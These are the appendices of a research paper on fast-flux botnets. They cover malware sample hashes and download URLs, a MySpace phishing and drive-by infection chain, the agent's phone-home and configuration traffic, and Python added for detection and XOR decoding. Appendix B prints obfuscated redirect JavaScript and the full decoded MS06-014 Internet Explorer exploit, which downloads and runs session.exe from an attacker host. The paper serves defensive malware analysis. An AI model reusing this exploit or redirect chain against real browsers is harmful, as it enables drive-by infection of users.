APPENDICES

APPENDIX A: Fast-Flux Proxy Samples

There have been noticeable advancements in the flux agent presented in this document over the past year: a migration away from arbitrary TCP connections used to obtain clear-text instructions, to the use of an HTTP library to obtain downloaded instructions, settings and binary updates, and finally to the most recent variants, which receive control settings via encoded update files. The following examples give a short historical timeline of just one fast-flux service network malware variant, the one responsible for all double-flux service networks referenced in this research. It is worth noting that we have observed evidence supporting five distinct fast-flux service nets in operation on the Internet, but have not acquired malware samples for all variants to support in-depth study.

Sample: 5cbef2780c8b59977ae598775bad8ecb-weby.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 51200 Bytes
Access: 2007-04-02 22:34:03.000000000 -0400
Modify: 2007-04-02 22:30:36.000000000 -0400
Change: 2007-04-02 22:34:03.000000000 -0400

MD5: 5cbef2780c8b59977ae598775bad8ecb
SHA1: 0925a54ba0366a6406d3222e65b03df0ea8cbc11

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-04-02 22:32:27] 5cbef2780c8b59977ae598775bad8ecb - http://xxx.myexes.hk/exes/weby.exe

Sample: 70978572bc5c4fecb9d759611b27a762-weby.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 50176 Bytes
Access: 2007-03-15 02:09:03.000000000 -0400
Modify: 2007-03-09 10:51:26.000000000 -0500
Change: 2007-03-15 02:09:03.000000000 -0400

MD5: 70978572bc5c4fecb9d759611b27a762
SHA1: f8a4d881257dc2f2b2c17ee43f60144e6615994d

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-03-15 02:06:43] 70978572bc5c4fecb9d759611b27a762 - http://xxx.myexes.hk/exes/webdlx/weby.exe

Sample: 5870fd7119a91323dbdf04ebd07d0ac7-plugin_ddos.dll
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 9728 Bytes
Access: 2007-04-02 15:39:05.000000000 -0400
Modify: 2007-03-09 23:48:17.000000000 -0500
Change: 2007-04-02 15:39:06.000000000 -0400

MD5: 5870fd7119a91323dbdf04ebd07d0ac7
SHA1: 4c4d1b3e2030e9a8f3b5c8f152ef9ac7590a96ca

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-04-02 15:36:55] 5870fd7119a91323dbdf04ebd07d0ac7 - http://65.111.176.xxx/weby/plugin_ddos.dll

Previous incarnation:

Sample: e903534fab14ee7e00c279d64f578cbb-webyx.exe
File type(s): MS-DOS executable (EXE)
Size: 29557 Bytes
Access: 2007-02-06 15:26:03.000000000 -0500
Modify: 2007-02-02 08:47:24.000000000 -0500
Change: 2007-02-06 15:26:03.000000000 -0500

MD5: e903534fab14ee7e00c279d64f578cbb
SHA1: cf8279c35ec7d8914f3a4ccaaa71e14e7a925b93

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-02-06 15:20:55] e903534fab14ee7e00c279d64f578cbb - http://xxx.myfiles.hk/exes/webyx.exe

Even older sample:

Sample: 88b58b62ae43f0fa42e852874aefbd01-weby.exe
File type(s): MS-DOS executable (EXE)
Size: 29425 Bytes
Access: 2007-01-20 16:29:06.000000000 -0500
Modify: 2007-01-20 05:39:22.000000000 -0500
Change: 2007-01-20 16:29:06.000000000 -0500

MD5: 88b58b62ae43f0fa42e852874aefbd01
SHA1: 6a22e1a06ced848da220301ab85be7a33867bfb5

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-01-20 16:26:12] 88b58b62ae43f0fa42e852874aefbd01 - http://xxx.myexes.hk/exes/weby.exe

A prehistoric sample of flux-agent code (according to Internet time). We first observed
nodes infected with this malware in the middle of 2006, but only acquired a malware sample
for analysis in November 2006:

Sample: d134894005c299c1c01e63d9012a12c6-CD373B130D74F24CA5F8F1ADECA0F6856BC6072A-dnssvc.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 11264 Bytes
Access: 2006-11-14 06:39:03.000000000 -0500
Modify: 2006-11-14 06:29:14.000000000 -0500
Change: 2006-11-14 06:39:03.000000000 -0500

MD5: d134894005c299c1c01e63d9012a12c6
SHA1: cd373b130d74f24ca5f8f1adeca0f6856bc6072a

Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2006-11-14 06:29:44] d134894005c299c1c01e63d9012a12c6 - CD373B130D74F24CA5F8F1ADE

APPENDIX B: The Infection Process

Now that you have a better understanding of the fast-flux technique, the different types, and the malware involved, let's see how the malware distribution process works. This is a real-world example of MySpace drive-by/phish attack vectors driving fast-flux network growth. In this example we identify two infection vectors:

1. Compromised MySpace Member profiles redirecting to drive-by/phish

2. SWF Flash image malicious redirection to drive-by/phish

We start with profile redirection in MySpace member profiles using iframes. Notice in this example just how many times iframes are called, often simply redirecting to yet another iframe. Also note the heavy use of obfuscated JavaScript. The attack begins when a connection is made to the domain http://xxx.e447aa2.com.

$ GET http://www.e447aa2.com
<HTML>
<HEAD>

<meta http-equiv="refresh" content="1;url="http://xxx.myspace.cfm.fuseaction.splash.mytoken.
76701a26.da3e.44a3a17b.e447aa2.com/da3e/index.php"/>

</HEAD>
</HTML>

By following the above /da3e/index.php link, we end up at a credible-looking MySpace landing page (served in flux); its most interesting element is the footer shown below:

<!-- onRequestEnd -->
<script>window.status="Done"</script><iframe src="../.footer_01.gif" width=0 height=0></iframe>

The iframe loads /.footer_01.gif, which is not an actual GIF file but an encoded/obfuscated JavaScript snippet. Below is the obfuscated JavaScript code it serves.

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41
%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65
%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E
%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28
%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B
%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28
%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
<SCRIPT Language="JavaScript">

eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41
%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65
%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E
%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28
%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B
%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28
%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

The decoded result of the above JavaScript is shown below; it is nothing more than another iframe, this one connecting to yet another site.

<script>window.status="Done"</script>

<iframe src="http://xxx.fafb4c4c.com/header_03.gif"></iframe>

The iframe-loaded /header_03.gif (served in flux) is yet another encoded/obfuscated JavaScript file; its decoded result is:

<script>window.status="Done"</script>

<iframe src="http://xxx.fafb4c4c.com/routine.php" width=1 height=1></iframe>

Following the iframe to /routine.php yields yet another encoded/obfuscated JavaScript file. Its decoded result is an attempt to exploit vulnerable Internet Explorer clients using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014), for which Microsoft released a patch in May 2006. Below is the decoded form of the actual attack. Be careful: this is live exploit code.

<script type="text/javascript">
function handleError() {
return true;
}
window.onerror = handleError;
</script>
<script>window.status="Done"</script>
<SCRIPT language="VBScript">

If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0 Then
Dim Obj_Name
Dim Obj_Prog
set obj_RDS = document.createElement("object")
obj_RDS.setAttribute "id", "obj_RDS"
obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
fn = "ntmusis32.exe"
Obj_Name = "Shell"
Obj_Prog = "Application"
set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set oFolder = obj_ShellApp.NameSpace(20)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
fn=WinDir & fn
Obj_Name = "Microsoft"
Obj_Prog = "XMLHTTP"
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "GET","http://xxx.fafb4c4c.com/session.exe",False
obj_msxml2.send
On Error Resume Next
Obj_Name = "ADODB"
Obj_Prog = "Stream"
set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
If Err.Number Then
Obj_Name = "Scripting"
Obj_Prog = "FileSystemObject"
Set obj_FileSys=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set download_file=obj_FileSys.CreateTextFile(fn, TRUE)
download_file_size=LenB(XMLBody)
For i=1 To download_file_size
cByte=MidB(XMLBody,i,1)
ByteCode=AscB(cByte)
download_file.Write(Chr(ByteCode))
Next
download_file.Close
Obj_Name = "WScript"
Obj_Prog = "Shell"
Set obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
On Error Resume Next
obj_WShell.Run fn,1,FALSE
Else
obj_adodb.Type=1
obj_adodb.Open
obj_adodb.Write(obj_msxml2.responseBody)
obj_adodb.SaveToFile fn,2
obj_ShellApp.ShellExecute fn
End If
End If
End If

</SCRIPT>

Successful compromise of a Windows host via this exploit content results in the download of a malicious downloader stub executable, session.exe, which is then responsible for attempting to download the additional malicious components needed to integrate the newly compromised host into a fast-flux service network. The session.exe sample above attempts to download and execute the following components:

http://xxx.myfiles.hk/exes/webdl3x/weby.exe
http://xxx.myfiles.hk/exes/webdl3x/oly.exe
http://xxx.camgenie.com/weby7.exe

Supporting Detail:

The following is a representative sampling of URLs to Flash files hosted on the imageshack.us site that perform one simple action: an ActionScript-based browser redirect to a flux-hosted combination phishing/drive-by exploit page that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014). All of the files are identical, as shown by the same MD5 and SHA1 hashes for every file:

MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740

The modification time maintained by the Imageshack HTTP server suggests an SWF compile time of 2007-06-05 03:56:30 -0700. Decompiling the Flash component gives:

$ swfdump -atp ./xxx.imageshack.us/img527/3530/38023350se6.swf

[HEADER] File version: 8
[HEADER] File size: 98
[HEADER] Frame rate: 120.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 1.00
[HEADER] Movie height: 1.00
[045] 4 FILEATTRIBUTES
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018] 31 PROTECT
[00c] 28 DOACTION
( 24 bytes) action: GetUrl URL:"http://xxx.e447aa2.com" Label:""
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END

Below are a few examples of URLs that host the same flash files:

http://xxx.imageshack.us/img116/1299/97231039qx0.swf
http://xxx.imageshack.us/img116/1424/81562934sa1.swf
http://xxx.imageshack.us/img116/1699/63088115dg4.swf
http://xxx.imageshack.us/img116/1700/81458378cv3.swf
http://xxx.imageshack.us/img116/2453/70754097cm0.swf
http://xxx.imageshack.us/img116/2456/14892185hl4.swf
http://xxx.imageshack.us/img116/8345/26333607xo4.swf
http://xxx.imageshack.us/img120/3595/53060403mw7.swf

The following are examples of flux-serviced MySpace phish/drive-by domains referenced from presumably compromised MySpace user accounts, all observed during the same time period, between 2007-06-26 17:35:44 and 23:18:00 (EDT -0400):

xxx.myspace.com.index.cfm.fuseaction.user.mytoken.00b24yqc.ac8a562.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0c38outb.h5v17lt.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0en0r8xd.115534a.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0l3ttn77.oqrhldv.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.0w4c4w74.jk33v96.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.3kuto9a4.de082ak.com
xxx.myspace.com.index.cfm.fuseaction.user.mytoken.5c1wkjil.kirjmbr.com

APPENDIX C: Fast-Flux Proxy Samples

In our fast-flux case study, this is where the infected flux agent makes its initial contact (phone-home) connection to a remote web server, reporting to the attacker that the victim system has been successfully infected and is standing by to provide flux-net services.

GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2007 07:55:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Length: 19
Connection: close
Content-Type: text/html; charset=UTF-8

Added Successfully!
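As an added example (not from the original page), the following Python parses the check-in request shown above and lists the features a defender can key detection on: the remote.php path with the agent's fixed set of query fields, the bare "MSIE 7.0" User-Agent (a real Internet Explorer sends "Mozilla/4.0 (compatible; MSIE 7.0; ...)"), and the nonsensical uptime string whose day, hour, minute and second components are all twelve-digit numbers. The sample request is constructed from the capture, with the Host left redacted exactly as the page shows it.

```python
"""Parser and triage checks for the flux agent's phone-home request.

Added example, not from the original page. SAMPLE_CHECKIN is constructed from
the capture above; the Host value is kept redacted as on the page."""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

SAMPLE_CHECKIN = (
    "GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1"
    "&version=2.0&build=beta004&uptime=244813135872w%20244813135872d"
    "%20244813135892h%20244813135919m%20244813135929s HTTP/1.1\r\n"
    "User-Agent: MSIE 7.0\r\n"
    "Host: xxx.ifeelyou.info\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)

# Query fields the agent always sends, as seen in the capture.
AGENT_FIELDS = {"os", "user", "status", "version", "build", "uptime"}
# Largest sane value for each sub-week unit; the sample exceeds all of them.
UNIT_LIMITS = {"d": 6, "h": 23, "m": 59, "s": 59}


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], Dict[str, str]]:
    """Return (method, path, query, headers) for one raw HTTP/1.x request."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, parts.path, query, headers


def implausible_uptime(uptime: str) -> bool:
    """True when any sub-week component is out of range; every component of
    the sample is a 12-digit number, so a real uptime counter is not the source."""
    parts = {unit: int(n) for n, unit in re.findall(r"(\d+)([wdhms])", uptime)}
    return any(parts.get(unit, 0) > limit for unit, limit in UNIT_LIMITS.items())


def checkin_indicators(raw: str) -> List[str]:
    """Reasons a request looks like this agent's check-in; empty for benign traffic."""
    _, path, query, headers = parse_request(raw)
    reasons = []
    if path.endswith("/remote.php") and AGENT_FIELDS <= set(query):
        reasons.append("remote.php check-in carrying the agent's fixed query fields")
    if re.fullmatch(r"MSIE \d+\.\d+", headers.get("user-agent", "")):
        reasons.append("bare 'MSIE x.y' User-Agent instead of IE's Mozilla/4.0 (compatible; ...) form")
    if implausible_uptime(query.get("uptime", "")):
        reasons.append("uptime string with out-of-range components")
    return reasons


if __name__ == "__main__":
    for reason in checkin_indicators(SAMPLE_CHECKIN):
        print("-", reason)
```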

APPENDIX D: Fast-Flux Proxy Samples

In our fast-flux case study, this is the server response to the fast-flux agent's request for the configuration file settings.ini on the remote web server. It appears to be a consistent 197-byte binary/encoded configuration response. We are still attempting to complete reverse engineering of this session:

00000000  4745 5420 2f73 6574 7469 6e67 732f 7765  GET /settings/we
00000010  6279 2f73 6574 7469 6e67 732e 696e 6920  by/settings.ini
00000020  4854 5450 2f31 2e31 0d0a 5573 6572 2d41  HTTP/1.1..User-A
00000030  6765 6e74 3a20 4d53 4945 2037 2e30 0d0a  gent: MSIE 7.0..
00000040  486f 7374 3a20 xxxx xxxx xxxx xxxx 2e69  Host: xxxxxxxx.i
00000050  636f 6e6e 6563 7479 6f75 2e62 697a 0d0a  connectyou.biz..
00000060  4361 6368 652d 436f 6e74 726f 6c3a 206e  Cache-Control: n
00000070  6f2d 6361 6368 650d 0a0d 0a47 4554 202f  o-cache....GET /
00000080  7365 7474 696e 6773 2f77 6562 792f 7365  settings/weby/se
00000090  7474 696e 6773 2e69 6e69 2048 5454 502f  ttings.ini HTTP/
000000a0  312e 310d 0a55 7365 722d 4167 656e 743a  1.1..User-Agent:
000000b0  204d 5349 4520 372e 300d 0a48 6f73 743a   MSIE 7.0..Host:
000000c0  20xx xxxx xxxx xxxx xx2e 6963 6f6e 6e65   xxxxxxxx.iconne
000000d0  6374 796f 752e 6269 7a0d 0a43 6163 6865  ctyou.biz..Cache
000000e0  2d43 6f6e 7472 6f6c 3a20 6e6f 2d63 6163  -Control: no-cac
000000f0  6865 0d0a 0d0a 4854 5450 2f31 2e31 2032  he....HTTP/1.1 2
00000100  3030 204f 4b0d 0a44 6174 653a 2054 7565  00 OK..Date: Tue
00000110  2c20 3033 2041 7072 2032 3030 3720 3037  , 03 Apr 2007 07
00000120  3a35 353a 3430 2047 4d54 0d0a 5365 7276  :55:40 GMT..Serv
00000130  6572 3a20 4170 6163 6865 2f32 2e30 2e35  er: Apache/2.0.5
00000140  3420 2846 6564 6f72 6129 0d0a 4c61 7374  4 (Fedora)..Last
00000150  2d4d 6f64 6966 6965 643a 204d 6f6e 2c20  -Modified: Mon,
00000160  3032 2041 7072 2032 3030 3720 3233 3a33  02 Apr 2007 23:3
00000170  373a 3336 2047 4d54 0d0a 4554 6167 3a20  7:36 GMT..ETag:
00000180  2238 3030 3761 2d63 352d 6234 6263 3730  "8007a-c5-b4bc70
00000190  3030 220d 0a41 6363 6570 742d 5261 6e67  00"..Accept-Rang
000001a0  6573 3a20 6279 7465 730d 0a43 6f6e 7465  es: bytes..Conte
000001b0  6e74 2d4c 656e 6774 683a 2031 3937 0d0a  nt-Length: 197..
000001c0  436f 6e6e 6563 7469 6f6e 3a20 636c 6f73  Connection: clos
000001d0  650d 0a43 6f6e 7465 6e74 2d54 7970 653a  e..Content-Type:
000001e0  2074 6578 742f 706c 6169 6e3b 2063 6861   text/plain; cha
000001f0  7273 6574 3d55 5446 2d38 0d0a 0d0a b2b4  rset=UTF-8......
00000200  0d0a 0d0a 8d8d 869a 958d 8595 819d 9d99  ................
00000210  d3c6 c6df dcc7 d8d8 d8c7 d8de dfc7 d8de  ................
00000220  ddc6 9e8c 8b90 c699 859c 8e80 87b6 8d8d  ................
00000230  869a c78d 8585 0d0a 0d0a 8d8d 869a 959d  ................
00000240  8a99 9588 848c 9b80 8a88 878d 9f8d c79d  ................
00000250  9f95 d1d9 95d8 d9d9 d9d9 0d0a 8d8d 869a  ................
00000260  959c 8d99 9588 848c 9b80 8a88 878d 9f8d  ................
00000270  c79d 9f95 d1d9 95d8 d9d9 d9d9 0d0a 8d8d  ................
00000280  869a 959d 9b86 8585 9588 848c 9b80 8a88  ................
00000290  878d 9f8d c79d 9f95 d1d9 95d8 d9d9 d9d9  ................
000002a0  0d0a 8d8d 869a 9581 9d9d 9995 8884 8c9b  ................
000002b0  808a 8887 8d9f 8dc7 9d9f 95d1 d995 d8d9  ................
000002c0  d9d9 d9                                  ...
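As an added example (not code from the original page, and not a result the authors state), the following Python shows how a single-byte XOR key can be recovered from the encoded body above with a known-plaintext crib. SETTINGS_PREFIX holds only the first 15 body bytes after the "[]\r\n\r\n" prefix (hexdump offset 0x204); the remaining body bytes decode with the same key but are not reproduced here because the page redacts the hosts they name. The choice of "http://" as the crib is a guess motivated by the agent fetching plugin_ddos.dll immediately afterwards, and the rule that the 0d0a separators are left unencoded is an observation from the hexdump.

```python
"""Single-byte XOR key recovery for the encoded settings.ini response.

Added example, not from the original page. SETTINGS_PREFIX is the first 15
body bytes after the "[]\r\n\r\n" prefix in the hexdump (offset 0x204)."""
from typing import List, Optional

SETTINGS_PREFIX = bytes.fromhex("8d8d 869a 958d 8595 819d 9d99 d3c6 c6")


def recover_xor_key(data: bytes, crib: bytes) -> Optional[int]:
    """Slide a known-plaintext crib over data; at the true offset every byte
    XORs to the same value, which is the key. Returns None if no offset fits."""
    for off in range(len(data) - len(crib) + 1):
        candidates = {data[off + i] ^ crib[i] for i in range(len(crib))}
        if len(candidates) == 1:
            return candidates.pop()
    return None


def xor_decode(data: bytes, key: int) -> bytes:
    """XOR every byte except CR/LF. In the capture the 0d0a record separators
    appear unencoded (observed in the hexdump, not stated by the authors)."""
    return bytes(b if b in (0x0D, 0x0A) else b ^ key for b in data)


def decode_records(body: bytes, key: int) -> List[List[str]]:
    """Decode a body and split it into pipe-separated records, one per line."""
    text = xor_decode(body, key).decode("latin-1")
    return [line.split("|") for line in text.split("\r\n") if line]


if __name__ == "__main__":
    key = recover_xor_key(SETTINGS_PREFIX, b"http://")
    print(hex(key), xor_decode(SETTINGS_PREFIX, key))
```

Because XOR is an involution, xor_decode() also encodes, which is what the round-trip check on a constructed plaintext relies on.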

APPENDIX E: Fast-Flux Proxy Samples

In our fast-flux case study, the system downloads a suspiciously named DLL, plugin_ddos.dll, whose name might suggest to some that it is a denial-of-service component.

00000000  4745 5420 2f77 6562 792f 706c 7567 696e  GET /weby/plugin
00000010  5f64 646f 732e 646c 6c20 4854 5450 2f31  _ddos.dll HTTP/1
00000020  2e31 0d0a 5573 6572 2d41 6765 6e74 3a20  .1..User-Agent:
00000030  4d53 4945 2037 2e30 0d0a 486f 7374 3a20  MSIE 7.0..Host:
00000040  3635 2e31 3131 2e31 3736 xxxx xxxx 0d0a  65.111.176.xxx..
00000050  4361 6368 652d 436f 6e74 726f 6c3a 206e  Cache-Control: n
00000060  6f2d 6361 6368 650d 0a0d 0a47 4554 202f  o-cache....GET /
00000070  7765 6279 2f70 6c75 6769 6e5f 6464 6f73  weby/plugin_ddos
00000080  2e64 6c6c 2048 5454 502f 312e 310d 0a55  .dll HTTP/1.1..U
00000090  7365 722d 4167 656e 743a 204d 5349 4520  ser-Agent: MSIE
000000a0  372e 300d 0a48 6f73 743a 2036 352e 3131  7.0..Host: 65.11
000000b0  312e 3137 362e xxxx xx0d 0a43 6163 6865  1.176.xxx..Cache
000000c0  2d43 6f6e 7472 6f6c 3a20 6e6f 2d63 6163  -Control: no-cac
000000d0  6865 0d0a 0d0a 4745 5420 2f77 6562 792f  he....GET /weby/
000000e0  706c 7567 696e 5f64 646f 732e 646c 6c20  plugin_ddos.dll
000000f0  4854 5450 2f31 2e31 0d0a 5573 6572 2d41  HTTP/1.1..User-A
00000100  6765 6e74 3a20 4d53 4945 2037 2e30 0d0a  gent: MSIE 7.0..
00000110  486f 7374 3a20 3635 2e31 3131 2e31 3736  Host: 65.111.176
00000120  2exx xxxx 0d0a 4361 6368 652d 436f 6e74  .xxx..Cache-Cont
00000130  726f 6c3a 206e 6f2d 6361 6368 650d 0a0d  rol: no-cache...
00000140  0a48 5454 502f 312e 3120 3230 3020 4f4b  .HTTP/1.1 200 OK
00000150  0d0a 4461 7465 3a20 5475 652c 2030 3320  ..Date: Tue, 03
00000160  4170 7220 3230 3037 2030 373a 3536 3a30  Apr 2007 07:56:0
00000170  3320 474d 540d 0a53 6572 7665 723a 2041  3 GMT..Server: A
00000180  7061 6368 652f 322e 302e 3534 2028 4665  pache/2.0.54 (Fe
00000190  646f 7261 290d 0a4c 6173 742d 4d6f 6469  dora)..Last-Modi
000001a0  6669 6564 3a20 5361 742c 2031 3020 4d61  fied: Sat, 10 Ma
000001b0  7220 3230 3037 2030 343a 3438 3a31 3720  r 2007 04:48:17
000001c0  474d 540d 0a45 5461 673a 2022 3830 3031  GMT..ETag: "8001
000001d0  312d 3236 3030 2d33 6661 3238 3634 3022  1-2600-3fa28640"
000001e0  0d0a 4163 6365 7074 2d52 616e 6765 733a  ..Accept-Ranges:
000001f0  2062 7974 6573 0d0a 436f 6e74 656e 742d   bytes..Content-
00000200  4c65 6e67 7468 3a20 3937 3238 0d0a 436f  Length: 9728..Co
00000210  6e6e 6563 7469 6f6e 3a20 636c 6f73 650d  nnection: close.
00000220  0a43 6f6e 7465 6e74 2d54 7970 653a 2061  .Content-Type: a
00000230  7070 6c69 6361 7469 6f6e 2f6f 6374 6574  pplication/octet
00000240  2d73 7472 6561 6d0d 0a0d 0a4d 5a50 0002  -stream....MZP..
00000250  0000 0004 000f 00ff ff00 00b8 0000 0000  ................
.
.
00000f80  0000 0050 6f72 7469 6f6e 7320 436f 7079  ...Portions Copy
00000f90  7269 6768 7420 2863 2920 3139 3939 2c32  right (c) 1999,2
00000fa0  3030 3320 4176 656e 6765 7220 6279 204e  003 Avenger by N
00000fb0  6854 0050 6a40 e8b8 f6ff ffc3 8d40 00b8  hT.Pj@.......@..
.
.
00002260  0000 0001 0000 0028 6000 002c 6000 0030  .......(`..,`..0
00002270  6000 00d4 2200 0042 6000 0000 0070 6c75  `..."..B`....plu
00002280  6769 6e5f 6464 6f73 2e64 6c6c 0056 616c  gin_ddos.dll.Val
00002290  6964 6174 6500 0000 0000 0000 0000 0000  idate...........
.
.
00002700  8237 b8f3 2442 0317 9b3a 8301 0000 8c00  .7..$B...:......
00002710  0000 0009 0000 0001 d070 6c75 6769 6e5f  .........plugin_
00002720  6464 6f73 001c a957 696e 536f 636b 0000  ddos...WinSock..
00002730  c753 7973 7465 6d00 0081 5379 7349 6e69  .System...SysIni
00002740  7400 0c4b 5769 6e64 6f77 7300 1055 5479  t..KWindows..UTy
00002750  7065 7300 0063 7368 6472 000c 3f57 696e  pes..cshdr..?Win
00002760  496e 6574 0000 7957 696e 536f 636b 3200  Inet..yWinSock2.
00002770  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002780  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002790  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027a0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027b0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027c0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027d0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027e0  0000 0000 0000 0000 0000 0000 0000 0000  ................
000027f0  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002800  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002810  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002820  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002830  0000 0000 0000 0000 0000 0000 0000 0000  ................
00002840  0000 0000 0000 0000 0000 00              ...........